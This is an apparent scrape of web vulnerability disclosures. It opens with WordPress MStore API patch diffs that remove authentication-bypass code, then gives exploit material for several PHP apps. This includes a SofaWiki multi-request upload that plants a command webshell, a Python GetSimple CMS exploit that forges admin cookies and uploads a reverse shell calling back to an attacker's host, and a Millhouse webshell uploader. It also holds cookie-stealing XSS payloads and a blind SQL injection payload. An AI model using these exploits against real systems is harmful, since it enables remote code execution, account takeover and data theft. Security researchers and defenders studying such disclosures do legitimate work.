The MStore API plugin for WordPress is vulnerable to authentication bypass in versions up to, and including, 3.9.0. This is due to insufficient verification on the user being supplied during the coupon redemption REST API request through the plugin. This makes it possible for unauthenticated attackers to log in as any existing user on the site, such as an administrator, if they have access to the user id.

**mstore-api/trunk/controllers/flutter-user.php**

r2910707

r2913397

 

215

215

                'methods' => 'GET',

216

216

                'callback' => array($this, 'check\_user'),

217

 

                'permission\_callback' => function () {

218

 

                    return parent::checkApiPermission();

219

 

                }

220

 

            ),

221

 

        ));

222

 

223

 

        register\_rest\_route($this->namespace, '/test\_push\_notification', array(

224

 

            array(

225

 

                'methods' => 'POST',

226

 

                'callback' => array($this, 'test\_push\_notification'),

227

 

                'permission\_callback' => function () {

228

 

                    return parent::checkApiPermission();

229

 

                }

230

 

            ),

231

 

        ));

232

 

233

 

        register\_rest\_route($this->namespace, '/test\_push\_notification\_created\_order', array(

234

 

            array(

235

 

                'methods' => 'POST',

236

 

                'callback' => array($this, 'test\_push\_notification\_created\_order'),

237

217

                'permission\_callback' => function () {

238

218

                    return parent::checkApiPermission();

…

…

 

1194

1174

    }

1195

1175

1196

 

    public function test\_push\_notification()

1197

 

    {

1198

 

        $json = file\_get\_contents('php://input');

1199

 

        $params = json\_decode($json);

1200

 

        $email = $params->email;

1201

 

        $is\_manager = $params->is\_manager;

1202

 

        $is\_delivery = $params->is\_delivery;

1203

 

        $user = get\_user\_by('email', $email);

1204

 

        $user\_id = $user->ID;

1205

 

        $serverKey = get\_option("mstore\_firebase\_server\_key");

1206

 

        $status = false;

1207

 

        $is\_onesignal = $params->is\_onesignal;

1208

 

        if($is\_onesignal){

1209

 

            $status = one\_signal\_push\_notification("Fluxstore", "Test push notification", array($user\_id));

1210

 

            return \['status' => $status\];

1211

 

        }

1212

 

        if (isset($is\_manager)) {

1213

 

            if ($is\_manager) {

1214

 

                $deviceToken = get\_user\_meta($user\_id, 'mstore\_manager\_device\_token', true);

1215

 

                if ($deviceToken) {

1216

 

                    $status = pushNotification("Fluxstore", "Test push notification", $deviceToken);

1217

 

                }

1218

 

            }

1219

 

            return \["deviceToken" => $deviceToken, 'serverKey' => $serverKey, 'status' => $status\];

1220

 

        }

1221

 

        if (isset($is\_delivery)) {

1222

 

            if ($is\_delivery) {

1223

 

                $deviceToken = get\_user\_meta($user\_id, 'mstore\_delivery\_device\_token', true);

1224

 

                if ($deviceToken) {

1225

 

                    $status = pushNotification("Fluxstore", "Test push notification", $deviceToken);

1226

 

                }

1227

 

            }

1228

 

            return \["deviceToken" => $deviceToken, 'serverKey' => $serverKey, 'status' => $status\];

1229

 

        }

1230

 

        $deviceToken = get\_user\_meta($user\_id, 'mstore\_device\_token', true);

1231

 

        if ($deviceToken) {

1232

 

            $status = pushNotification("Fluxstore", "Test push notification", $deviceToken);

1233

 

        }

1234

 

        return \["deviceToken" => $deviceToken, 'serverKey' => $serverKey, 'status' => $status\];

1235

 

    }

1236

 

1237

 

    function test\_push\_notification\_created\_order(){

1238

 

        $json = file\_get\_contents('php://input');

1239

 

        $params = json\_decode($json);

1240

 

        return trackNewOrder($params->order\_id);

1241

 

    }

1242

 

1243

1176

    function chat\_notification()

1244

1177

    {

**mstore-api/trunk/controllers/flutter-woo.php**

r2910707

r2913397

 

743

743

        }

744

744

745

 

        if (isset($body\["customer\_id"\]) && $body\["customer\_id"\] != null) {

746

 

            $userId = $body\["customer\_id"\];

747

 

            $user = get\_userdata($userId);

748

 

            if ($user) {

749

 

                wp\_set\_current\_user($userId, $user->user\_login);

750

 

                wp\_set\_auth\_cookie($userId);

751

 

                WC()->customer = new WC\_Customer($userId, true);

752

 

            }

 

745

        $cookie = $request->get\_header("User-Cookie");

 

746

        if (isset($cookie) && $cookie != null) {

 

747

            $user\_id = validateCookieLogin($cookie);

 

748

            if (is\_wp\_error($user\_id)) {

 

749

                return $user\_id;

 

750

            }

 

751

            wp\_set\_current\_user($user\_id);

 

752

            wp\_set\_auth\_cookie($user\_id);

 

753

            WC()->customer = new WC\_Customer($user\_id, true);

753

754

        }

754

755

**mstore-api/trunk/functions/index.php**

r2910707

r2913397

 

113

113

114

114

    if (isset($deviceToken) && $deviceToken != false) {

115

 

        pushNotification($title, $message, $deviceToken);

116

 

    }

117

 

    one\_signal\_push\_notification($title,$message,array($userId));

 

115

        \_pushNotificationFirebase($userId,$title, $message, $deviceToken);

 

116

    }

 

117

    \_pushNotificationOneSignal($userId, $title,$message);

118

118

}

119

119

…

…

 

142

142

            $result = $wpdb->get\_results($sql);

143

143

144

 

            $user\_ids = array();

145

144

            foreach ($result as $item) {

146

 

                $user\_ids\[\]=$item->delivery\_boy;

147

145

                $deviceToken = get\_user\_meta($item->delivery\_boy, 'mstore\_delivery\_device\_token', true);

148

146

                if (isset($deviceToken) && $deviceToken != false) {

149

 

                    pushNotification($title, $message, $deviceToken);

 

147

                    \_pushNotificationFirebase($item->delivery\_boy,$title, $message, $deviceToken);

150

148

                }

151

 

            }

152

 

            one\_signal\_push\_notification($title,$message, $user\_ids);

 

149

                \_pushNotificationOneSignal($title,$message, $item->delivery\_boy);

 

150

            }

153

151

        }

154

152

…

…

 

176

174

            $deviceToken = get\_user\_meta($driver\_id, 'mstore\_delivery\_device\_token', true);

177

175

            if (isset($deviceToken) && $deviceToken != false) {

178

 

                pushNotification($title, $message, $deviceToken);

 

176

                \_pushNotificationFirebase($driver\_id,$title, $message, $deviceToken);

179

177

                $wpdb->insert($table\_name, array(

180

178

                    'message' => $message,

…

…

 

202

200

    $deviceToken = get\_user\_meta($order\_seller\_id, 'mstore\_device\_token', true);

203

201

    if (isset($deviceToken) && $deviceToken != false) {

204

 

        pushNotification($title, $message, $deviceToken);

 

202

        \_pushNotificationFirebase($order\_seller\_id,$title, $message, $deviceToken);

205

203

    }

206

204

    $managerDeviceToken = get\_user\_meta($order\_seller\_id, 'mstore\_manager\_device\_token', true);

207

205

    if (isset($managerDeviceToken) && $managerDeviceToken != false) {

208

 

        pushNotification($title, $message, $managerDeviceToken);

 

206

        \_pushNotificationFirebase($order\_seller\_id,$title, $message, $managerDeviceToken);

209

207

        if (is\_plugin\_active('wc-multivendor-marketplace/wc-multivendor-marketplace.php')) {

210

208

            wcfm\_message\_on\_new\_order($order\_id);

211

209

        }

212

210

    }

213

 

    one\_signal\_push\_notification($title, $message, array($order\_seller\_id));

 

211

    \_pushNotificationOneSignal($order\_seller\_id,$title, $message);

214

212

}

215

213

…

…

 

611

609

        $managerDeviceToken = get\_user\_meta($seller\_id, 'mstore\_manager\_device\_token', true);

612

610

        if (isset($managerDeviceToken) && $managerDeviceToken != false) {

613

 

            pushNotification($title, $message, $managerDeviceToken);

614

 

        }

615

 

        one\_signal\_push\_notification($title, $message, array($seller\_id));

616

 

    }

 

611

            \_pushNotificationFirebase($seller\_id, $title, $message, $managerDeviceToken);

 

612

        }

 

613

        \_pushNotificationOneSignal($seller\_id,$title, $message);

 

614

    }

 

615

}

 

616

 

617

function \_pushNotificationFirebase($user\_id, $title, $message, $deviceToken){

 

618

    $is\_on = isNotificationEnabled($user\_id);

 

619

    if($is\_on){

 

620

        pushNotification($title, $message, $deviceToken);

 

621

    }

 

622

}

 

623

 

624

function \_pushNotificationOneSignal($user\_id, $title, $message){

 

625

    $is\_on = isNotificationEnabled($user\_id);

 

626

    if($is\_on){

 

627

        one\_signal\_push\_notification($title,$message,array($userId));

 

628

    }

 

629

}

 

630

 

631

function isNotificationEnabled($user\_id){

 

632

    $is\_on = get\_user\_meta($user\_id, "mstore\_notification\_status", true);

 

633

    return  $is\_on === "" || $is\_on === "on";

617

634

}

618

635

?>

**mstore-api/trunk/mstore-api.php**

r2910707

r2913397

 

4

4

 \* Plugin URI: https://github.com/inspireui/mstore-api

5

5

 \* Description: The MStore API Plugin which is used for the MStore and FluxStore Mobile App

6

 

 \* Version: 3.9.0

 

6

 \* Version: 3.9.1

7

7

 \* Author: InspireUI

8

8

 \* Author URI: https://inspireui.com

…

…

 

37

37

include\_once plugin\_dir\_path(\_\_FILE\_\_) . "controllers/flutter-wholesale.php";

38

38

include\_once plugin\_dir\_path(\_\_FILE\_\_) . "controllers/flutter-stripe.php";

 

39

include\_once plugin\_dir\_path(\_\_FILE\_\_) . "controllers/flutter-notification.php";

39

40

40

41

class MstoreCheckOut

41

42

{

42

 

    public $version = '3.9.0';

 

43

    public $version = '3.9.1';

43

44

44

45

    public function \_\_construct()

**mstore-api/trunk/readme.txt**

r2910707

r2913397

 

4

4

Requires at least: 4.4

5

5

Tested up to:      6.0.0

6

 

Stable tag:        3.9.0

 

6

Stable tag:        3.9.1

7

7

License:           GPL-2.0

8

8

License URI:       https://www.gnu.org/licenses/gpl-2.0.html

…

…

 

44

44

45

45

\== Changelog ==

 

46

\= 3.9.1 =

 

47

  \* Fix security issue for coupon api

 

48

46

49

\= 3.9.0 =

47

50

  \* Fix to push notification to seller when order created

CVE-2023-2733: Diff [2910707:2913397] for mstore-api – WordPress Plugin Repository

The MStore API plugin for WordPress is vulnerable to authentication bypass in versions up to, and including, 3.9.2. This is due to insufficient verification on the user being supplied during the add listing REST API request through the plugin. This makes it possible for unauthenticated attackers to log in as any existing user on the site, such as an administrator, if they have access to the user id.

**mstore-api/trunk/controllers/listing-rest-api/class.api.fields.php**

r2915729

r2916124

 

381

381

                }

382

382

        ));

383

 

384

 

        register\_rest\_route('wp/v2', '/add-listing', array(

385

 

            'methods' => 'GET',

386

 

            'callback' => array(

387

 

                $this,

388

 

                'add\_listing'

389

 

            ) ,

390

 

            'permission\_callback' => function () {

391

 

                return true;

392

 

            }

393

 

        ));

394

383

       

395

384

        register\_rest\_route('wp/v2', '/get-nearby-listings', array(

…

…

 

1072

1061

            $user = get\_userdata($object\['author'\]);

1073

1062

            return $user->display\_name;

1074

 

        }

1075

 

1076

 

        //-----------------//

1077

 

       

1078

 

1079

 

        public function add\_listing($request)

1080

 

        {

1081

 

            $id = $request\['id'\];

1082

 

            wp\_clear\_auth\_cookie();

1083

 

            wp\_set\_current\_user($id);

1084

 

            wp\_set\_auth\_cookie($id, true);

1085

 

            header("Location: " . $request\['url'\]);

1086

 

            die();

1087

1063

        }

1088

1064

**mstore-api/trunk/mstore-api.php**

r2915729

r2916124

 

4

4

 \* Plugin URI: https://github.com/inspireui/mstore-api

5

5

 \* Description: The MStore API Plugin which is used for the MStore and FluxStore Mobile App

6

 

 \* Version: 3.9.2

 

6

 \* Version: 3.9.3

7

7

 \* Author: InspireUI

8

8

 \* Author URI: https://inspireui.com

…

…

 

41

41

class MstoreCheckOut

42

42

{

43

 

    public $version = '3.9.2';

 

43

    public $version = '3.9.3';

44

44

45

45

    public function \_\_construct()

**mstore-api/trunk/readme.txt**

r2915729

r2916124

 

4

4

Requires at least: 4.4

5

5

Tested up to:      6.0.0

6

 

Stable tag:        3.9.2

 

6

Stable tag:        3.9.3

7

7

License:           GPL-2.0

8

8

License URI:       https://www.gnu.org/licenses/gpl-2.0.html

…

…

 

44

44

45

45

\== Changelog ==

 

46

\= 3.9.3 =

 

47

  \* Fix security issue for listing api

 

48

46

49

\= 3.9.2 =

47

50

  \* Fix security issue for cart api

CVE-2023-2732: Diff [2915729:2916124] for mstore-api – WordPress Plugin Repository

SofaWiki <= 3.8.9 has a file upload vulnerability that leads to command execution.

1.  The PHP file an be uploaded directly by matching referer.

    // index.php
    case 'uploadbigfile':   		if ($user->hasright('upload', '') || stristr($swBaseHrefFolder,$referer))
    							{
    									include 'inc/special/uploadbigfile.php';
    							}
    

    // uploadbigfile.php
    if (isset($_FILES['uploadedfile']) && is_uploaded_file($_FILES['uploadedfile']['tmp_name']))
    {	 
    	 $filename = $_FILES['uploadedfile']['name'];
    	 $newfile = $swRoot.'/site/uploadbig/'.$filename;
    	 move_uploaded_file($_FILES['uploadedfile']['tmp_name'],$newfile);
    	 
    	 $checksum = md5_file($newfile);
    	 if ($checksum == $filename)
    	 {
    		 echo 'upload ok '.$filename;
    	 }
    	 else
    	 {
    		 echo 'checksum error filename '.$filename.' checksum '.$checksum. ' length '.filesize($newfile);
    		 unlink($newfile);
    	 }
    	 
    	 $_FILES = null;
    	 
    	 exit();
    }
    

2.  Send a request package to get checksum.

    POST /sofawiki-master/index.php?action=uploadbigfile HTTP/1.1
    Host: 172.16.134.41
    Content-Length: 243
    User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36
    Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryk1tApDzIaBAxp9EH
    Accept: */*
    Origin: http://172.16.134.41
    Referer: http://172.16.134.41/sofawiki-master/index.php?action=view&name=special:upload-big&lang=en
    Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
    
    ------WebKitFormBoundaryk1tApDzIaBAxp9EH
    Content-Disposition: form-data; name="uploadedfile"; filename="idontknow"
    Content-Type: application/octet-stream
    
    <?php echo system($_REQUEST["cmd"]);?>
    ------WebKitFormBoundaryk1tApDzIaBAxp9EH--
    

3.  Send three request packets using checksum to create a malicious PHP file.

> 1st

    POST /sofawiki-master/index.php?action=uploadbigfile HTTP/1.1
    Host: 172.16.134.41
    Content-Length: 283
    User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36
    Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryfiZ05SNBgGM9pnBh
    Accept: */*
    Origin: http://172.16.134.41
    Referer: http://172.16.134.41/sofawiki-master/index.php?action=view&name=special:upload-big&lang=en
    Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
    
    ------WebKitFormBoundaryfiZ05SNBgGM9pnBh
    Content-Disposition: form-data; name="checkchunks"
    
    edc4325bdef3f7fb70abd0389e85f6d1
    ------WebKitFormBoundaryfiZ05SNBgGM9pnBh
    Content-Disposition: form-data; name="filename"
    
    evilupload.php
    ------WebKitFormBoundaryfiZ05SNBgGM9pnBh--
    

> 2nd

    POST /sofawiki-master/index.php?action=uploadbigfile HTTP/1.1
    Host: 172.16.134.41
    Content-Length: 266
    User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36
    Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryk1tApDzIaBAxp9EH
    Accept: */*
    Origin: http://172.16.134.41
    Referer: http://172.16.134.41/sofawiki-master/index.php?action=view&name=special:upload-big&lang=en
    Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
    
    ------WebKitFormBoundaryk1tApDzIaBAxp9EH
    Content-Disposition: form-data; name="uploadedfile"; filename="edc4325bdef3f7fb70abd0389e85f6d1"
    Content-Type: application/octet-stream
    
    <?php echo system($_REQUEST["cmd"]);?>
    ------WebKitFormBoundaryk1tApDzIaBAxp9EH--
    

> 3rd

    POST /sofawiki-master/index.php?action=uploadbigfile HTTP/1.1
    Host: 172.16.134.41
    Content-Length: 574
    User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36
    Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryfeK0BammsIbqUGBr
    Accept: */*
    Origin: http://172.16.134.41
    Referer: http://172.16.134.41/sofawiki-master/index.php?action=view&name=special:upload-big&lang=en
    Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
    
    ------WebKitFormBoundaryfeK0BammsIbqUGBr
    Content-Disposition: form-data; name="composechunks"
    
    edc4325bdef3f7fb70abd0389e85f6d1
    ------WebKitFormBoundaryfeK0BammsIbqUGBr
    Content-Disposition: form-data; name="filename"
    
    evilupload.php
    ------WebKitFormBoundaryfeK0BammsIbqUGBr
    Content-Disposition: form-data; name="comment"
    
    test
    ------WebKitFormBoundaryfeK0BammsIbqUGBr
    Content-Disposition: form-data; name="uploadtime"
    
    1
    ------WebKitFormBoundaryfeK0BammsIbqUGBr
    Content-Disposition: form-data; name="start"
    
    0
    ------WebKitFormBoundaryfeK0BammsIbqUGBr--
    

4.  After uploading a malicious PHP file, arbitrary code can be executed.

CVE-2023-29721: [Vuln]There is a file upload vulnerability that leads to command execution. · Issue #27 · bellenuit/sofawiki

GetSimple CMS version 3.3.16 suffers from a remote shell upload vulnerability.

    # Exploit Title: GetSimple CMS v3.3.16 - Remote Code Execution (RCE)# Data: 18/5/2023# Exploit Author : Youssef Muhammad# Vendor: Get-simple# Software Link:# Version app: 3.3.16# Tested on: linux# CVE: CVE-2022-41544import sysimport hashlibimport reimport requestsfrom xml.etree import ElementTreefrom threading import Threadimport telnetlibpurple = "\033[0;35m"reset = "\033[0m"yellow = "\033[93m"blue = "\033[34m"red = "\033[0;31m"def print_the_banner():    print(purple + ''' CCC V     V EEEE      22   000   22   22      4  4  11  5555 4  4 4  4 C    V     V E        2  2 0  00 2  2 2  2     4  4 111  5    4  4 4  4 C     V   V  EEE  ---   2  0 0 0   2    2  --- 4444  11  555  4444 4444 C      V V   E         2   00  0  2    2          4  11     5    4    4  CCC    V    EEEE     2222  000  2222 2222        4 11l1 555     4    4  '''+ reset)def get_version(target, path):    r = requests.get(f"http://{target}{path}admin/index.php")    match = re.search("jquery.getsimple.js\?v=(.*)\"", r.text)    if match:        version = match.group(1)        if version <= "3.3.16":            print( red + f"[+] the version {version} is vulnrable to CVE-2022-41544")        else:            print ("This is not vulnrable to this CVE")        return version    return Nonedef api_leak(target, path):    r = requests.get(f"http://{target}{path}data/other/authorization.xml")    if r.ok:        tree = ElementTree.fromstring(r.content)        apikey = tree[0].text        print(f"[+] apikey obtained {apikey}")        return apikey    return Nonedef set_cookies(username, version, apikey):    cookie_name = hashlib.sha1(f"getsimple_cookie_{version.replace('.', '')}{apikey}".encode()).hexdigest()    cookie_value = hashlib.sha1(f"{username}{apikey}".encode()).hexdigest()    cookies = f"GS_ADMIN_USERNAME={username};{cookie_name}={cookie_value}"    headers = {        'Content-Type':'application/x-www-form-urlencoded',        'Cookie': cookies    }    return headersdef get_csrf_token(target, path, headers):    r = requests.get(f"http://{target}{path}admin/theme-edit.php", headers=headers)    m = re.search('nonce" type="hidden" value="(.*)"', r.text)    if m:        print("[+] csrf token obtained")        return m.group(1)    return Nonedef upload_shell(target, path, headers, nonce, shell_content):    upload_url = f"http://{target}{path}admin/theme-edit.php?updated=true"    payload = {        'content': shell_content,        'edited_file': '../shell.php',        'nonce': nonce,        'submitsave': 1    }    try:        response = requests.post(upload_url, headers=headers, data=payload)        if response.status_code == 200:            print("[+] Shell uploaded successfully!")        else:            print("(-) Shell upload failed!")    except requests.exceptions.RequestException as e:        print("(-) An error occurred while uploading the shell:", e)def shell_trigger(target, path):    url = f"http://{target}{path}/shell.php"    try:        response = requests.get(url)        if response.status_code == 200:            print("[+] Webshell trigged successfully!")        else:            print("(-) Failed to visit the page!")    except requests.exceptions.RequestException as e:        print("(-) An error occurred while visiting the page:", e)def main():    if len(sys.argv) != 5:        print("Usage: python3 CVE-2022-41544.py <target> <path> <ip:port> <username>")        return    target = sys.argv[1]    path = sys.argv[2]    if not path.endswith('/'):        path += '/'    ip, port = sys.argv[3].split(':')    username = sys.argv[4]    shell_content = f"""<?php    $ip = '{ip}';    $port = {port};    $sock = fsockopen($ip, $port);    $proc = proc_open('/bin/sh', array(0 => $sock, 1 => $sock, 2 => $sock), $pipes);    """    version = get_version(target, path)    if not version:        print("(-) could not get version")        return    apikey = api_leak(target, path)    if not apikey:        print("(-) could not get apikey")        return    headers = set_cookies(username, version, apikey)    nonce = get_csrf_token(target, path, headers)    if not nonce:        print("(-) could not get nonce")        return    upload_shell(target, path, headers, nonce, shell_content)    shell_trigger(target, path)if __name__ == '__main__':    print_the_banner()    main()

GetSimple CMS 3.3.16 Shell Upload

thrsrossi Millhouse-Project version 1.414 suffers from a remote shell upload vulnerability.

    <?php/*Exploit Title: thrsrossi Millhouse-Project 1.414 - Remote Code ExecutionDate: 12/05/2023Exploit Author: Chokri HammediVendor Homepage: https://github.com/thrsrossi/Millhouse-ProjectSoftware Link: https://github.com/thrsrossi/Millhouse-Project.gitVersion: 1.414Tested on: DebianCVE: N/A*/$options = getopt('u:c:');if(!isset($options['u'], $options['c']))die("\033[1;32m \n Millhouse Remote Code Execution \n Author: Chokri Hammedi\n \n Usage : php exploit.php -u http://target.org/ -c whoami\n\n\033[0m\n\n");$target     =  $options['u'];$command    =  $options['c'];$url = $target . '/includes/add_post_sql.php';$post = '------WebKitFormBoundaryzlHN0BEvvaJsDgh8Content-Disposition: form-data; name="title"helloworld------WebKitFormBoundaryzlHN0BEvvaJsDgh8Content-Disposition: form-data; name="description"<p>sdsdsds</p>------WebKitFormBoundaryzlHN0BEvvaJsDgh8Content-Disposition: form-data; name="files"; filename=""Content-Type: application/octet-stream------WebKitFormBoundaryzlHN0BEvvaJsDgh8Content-Disposition: form-data; name="category"1------WebKitFormBoundaryzlHN0BEvvaJsDgh8Content-Disposition: form-data; name="image"; filename="rose.php"Content-Type: application/x-php<?php$shell = shell_exec("' . $command . '");echo $shell;?>------WebKitFormBoundaryzlHN0BEvvaJsDgh8--';$headers = array(    'Content-Type: multipart/form-data;boundary=----WebKitFormBoundaryzlHN0BEvvaJsDgh8',    'Cookie: PHPSESSID=rose1337',);$ch = curl_init($url);curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);curl_setopt($ch, CURLOPT_URL, $url);curl_setopt($ch, CURLOPT_POSTFIELDS, $post);curl_setopt($ch, CURLOPT_POST, true);curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);curl_setopt($ch, CURLOPT_HEADER, true);$response = curl_exec($ch);curl_close($ch);// execute command$shell = "{$target}/images/rose.php?cmd=" . urlencode($command);$ch = curl_init($shell);curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);$exec_shell = curl_exec($ch);curl_close($ch);echo "\033[1;32m \n".$exec_shell . "\033[0m\n \n";?>

thrsrossi Millhouse-Project 1.414 Shell Upload

Webkul Qloapps version 1.5.2 suffers from a cross site scripting vulnerability.

# Exploit Title: Webkul Qloapps 1.5.2 - Cross-Site Scripting (XSS)  
# Date: 15 May 2023  
# Exploit Author: Astik Rawat (ahrixia)  
# Vendor Homepage: https://qloapps.com/  
# Software Link: https://github.com/webkul/hotelcommerce  
# Version: 1.5.2  
# Tested on: Kali Linux 2022.4  
# CVE : CVE-2023-30256

Description:

A Cross Site Scripting (XSS) vulnerability exists in Webkul Qloapps which is a free and open-source hotel reservation & online booking system written in PHP and distributed under OSL-3.0 Licence.

Steps to exploit:  
1) Go to Signin page on the system.  
2) There are two parameters which can be exploited via XSS  
  - back  
  - email_create

2.1) Insert your payload in the "back"- GET and POST Request   
  Proof of concept (Poc):  
  The following payload will allow you to execute XSS - 

    Payload (Plain text):   
  xss onfocus=alert(1) autofocus= xss

  Payload (URL Encoded):   
  xss%20onfocus%3dalert(1)%20autofocus%3d%20xss

  Full GET Request (back):   
  [http://localhost/hotelcommerce-1.5.2/?rand=1679996611398&controller=authentication&SubmitCreate=1&ajax=true&email_create=a&back=xss%20onfocus%3dalert(1)%20autofocus%3d%20xss&token=6c62b773f1b284ac4743871b300a0c4d]

2.2) Insert your payload in the "email_create" - POST Request Only  
  Proof of concept (Poc):  
  The following payload will allow you to execute XSS - 

  Payload (Plain text):   
  xss><img src=a onerror=alert(document.cookie)>xss

  Payload (URL Encoded):   
  xss%3e%3cimg%20src%3da%20onerror%3dalert(document.cookie)%3exss

  POST Request (email_create) (POST REQUEST DATA ONLY):   
  [controller=authentication&SubmitCreate=1&ajax=true&email_create=xss%3e%3cimg%20src%3da%20onerror%3dalert(document.cookie)%3exss&back=my-account&token=6c62b773f1b284ac4743871b300a0c4d]

Webkul Qloapps 1.5.2 Cross Site Scripting

Quicklancer version 1.0 suffers from a remote SQL injection vulnerability.

    # Exploit Title: Quicklancer v1.0 - SQL Injection# Date: 2023-05-17# Exploit Author: Ahmet Ümit BAYRAM# Vendor:https://codecanyon.net/item/quicklancer-freelance-marketplace-php-script/39087135# Demo Site: https://quicklancer.bylancer.com# Tested on: Kali Linux# CVE: N/A### Request ###POST /php/user-ajax.php HTTP/1.1Content-Type: application/x-www-form-urlencodedAccept: */*x-requested-with: XMLHttpRequestReferer: https://localhostCookie: sec_session_id=12bcd985abfc52d90489a6b5fd8219b2;quickjob_view_counted=31; Quick_lang=arabicContent-Length: 93Accept-Encoding: gzip,deflate,brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36(KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36Host: localhostConnection: Keep-aliveaction=searchStateCountry&dataString=deneme### Parameter & Payloads ###Parameter: dataString (POST)    Type: time-based blind    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)    Payload: action=searchStateCountry&dataString=deneme' AND (SELECT 8068FROM (SELECT(SLEEP(5)))qUdx) AND 'nbTo'='nbTo

Quicklancer 1.0 SQL Injection

Esg version 2.5 suffers from a cross site scripting vulnerability.

**Esg 2.5 Cross Site Scripting**

Posted May 24, 2023

Authored by indoushka

Esg version 2.5 suffers from a cross site scripting vulnerability.

tags | exploit, xss

SHA-256 | af04171eca15deed52f8552f83c674dd50fbac0bfc4810eb316c96bde1b17488

Download | Favorite | View

**Esg 2.5 Cross Site Scripting**

    ===========================================================================================| # Title     : Esg 2.5 XSS Vulnerability                                                 || # Author    : indoushka                                                                 || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 103.0(64-bit)     | | # Vendor    : https://www.creatop.com.tw/esg                                            |  | # Dork      : Powered by CREATOP                                                        |===========================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Use Payload : /en/news/news.php?page=1&tayear=2023'"()%26%25<script>alert(/indoushka/);</script>[+] http://www.127.0.0.1/vitaltec.com.tw/en/news/news.php?page=1&tayear=2023'"()%26%25<script>alert(/indoushka/);</script>Greetings to :===================================================================================jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* moncet|=================================================================================================

**File Tags**

*   ActiveX (932)
*   Advisory (81,187)
*   Arbitrary (16,018)
*   BBS (2,859)
*   Bypass (1,690)
*   CGI (1,024)
*   Code Execution (7,128)
*   Conference (677)
*   Cracker (841)
*   CSRF (3,315)
*   DoS (23,129)
*   Encryption (2,360)
*   Exploit (51,088)
*   File Inclusion (4,193)
*   File Upload (952)
*   Firewall (821)
*   Info Disclosure (2,712)
*   Intrusion Detection (883)
*   Java (2,998)
*   JavaScript (838)
*   Kernel (6,550)
*   Local (14,376)
*   Magazine (586)
*   Overflow (12,597)
*   Perl (1,421)
*   PHP (5,123)
*   Proof of Concept (2,302)
*   Protocol (3,559)
*   Python (1,499)
*   Remote (30,474)
*   Root (3,552)
*   Rootkit (505)
*   Ruby (607)
*   Scanner (1,633)
*   Security Tool (7,845)
*   Shell (3,159)
*   Shellcode (1,211)
*   Sniffer (892)
*   Spoof (2,189)
*   SQL Injection (16,219)
*   TCP (2,394)
*   Trojan (687)
*   UDP (883)
*   Virus (664)
*   Vulnerability (31,548)
*   Web (9,548)
*   Whitepaper (3,742)
*   x86 (958)
*   XSS (17,668)
*   Other

**File Archives**

*   May 2023
*   April 2023
*   March 2023
*   February 2023
*   January 2023
*   December 2022
*   November 2022
*   October 2022
*   September 2022
*   August 2022
*   July 2022
*   June 2022
*   Older

**Systems**

*   AIX (428)
*   Apple (1,970)
*   BSD (372)
*   CentOS (57)
*   Cisco (1,920)
*   Debian (6,746)
*   Fedora (1,691)
*   FreeBSD (1,244)
*   Gentoo (4,312)
*   HPUX (879)
*   iOS (342)
*   iPhone (108)
*   IRIX (220)
*   Juniper (67)
*   Linux (45,712)
*   Mac OS X (685)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (482)
*   RedHat (13,293)
*   Slackware (941)
*   Solaris (1,610)
*   SUSE (1,444)
*   Ubuntu (8,597)
*   UNIX (9,230)
*   UnixWare (186)
*   Windows (6,554)
*   Other

Esg 2.5 Cross Site Scripting

A vulnerability was found in SourceCodester Theme Park Ticketing System 1.0. It has been classified as critical. This affects an unknown part of the file print_ticket.php of the component GET Parameter Handler. The manipulation of the argument id leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-229821 was assigned to this vulnerability.

CVE-2023-2865

A vulnerability was found in SourceCodester Online Jewelry Store 1.0 and classified as problematic. Affected by this issue is some unknown functionality of the file customer.php of the component POST Parameter Handler. The manipulation of the argument Custid leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-229820.

Tag

#php